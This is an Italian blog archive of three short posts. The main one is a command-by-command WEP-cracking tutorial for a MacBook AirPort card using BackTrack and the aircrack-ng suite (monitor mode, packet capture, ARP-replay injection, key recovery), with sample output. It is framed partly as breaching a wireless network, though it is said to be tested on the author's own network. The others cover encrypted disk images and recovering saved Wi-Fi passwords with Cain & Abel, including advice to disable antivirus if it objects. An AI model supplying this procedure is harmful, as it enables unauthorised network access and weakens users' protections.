logo

Archive for Password

Back|Track Packet injection con AirPort

dragon_small.jpg

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”” Nikname:””

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key :off Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro


Criptare files su MAC

Per criptare dati sul proprio Mac suggerisco di sfruttare le potenzialità della piattaforma OS. Difatti una valida alternativa a FileVault (che protegge, criptandola, la cartella inizio) è utlizzare Utility Disco per creare una immagine protetta a 128 o 256 Bit!

Immagine 3.png

Dalla cartella Utility lanciate Utility Disco

Immagine 4.png

e selezionate Nuova Immagine

Immagine 5.png

decidete il nome, la posizione e la dimensione dell’immagine, poi selezionate il tipo di Criptatura desiderata

Immagine 6.png

consiglio 256-bit AES, con un core2 non si riscontrano problemi di lentezza

Immagine 7.png

poi scegliete la password da impegare, naturalmente facile da ricordare (la finestra vi indica anche la robustezza della stessa)

Immagine 8.png

Il programma crea un file xxxxxx.dmg criptato.

Per accedere ai vostri dati inserite la votra password

Immagine 9.png

e qualora corretta accedete al vostro disco virtuale. Cosiglio di non salvarla nel portachiavi.

Per cripatare nuovamente basta espellere il disco

Immagine 10.png

Wireless Password

Come accennavo nell’articolo relativo la sicurezza wireless, per la creazione delle password consiglio un programma dedicato che le generi modo randomico.Naturalmente puà accadere di perderle e allora come facciamo?Se non avete formattato l’hard disk in pochi minuti possiamo recuperale.Per far questo installiamo il programma Cain & Abel.

Se durante l’installazione il vostro antivirus vi segnala qualcosa, state tranquilli e procedete, se vi cancella un file, disabilitatelo e reinstallate.

Adesso avviate il programma e vi troverete di default nella sezione “Decoders”, cliccate su Wireless Password” e spostatevi nella tabella adiacente, cliccate il punsante “+” (quello blu) ed ecco apparire le vostre password smarrite.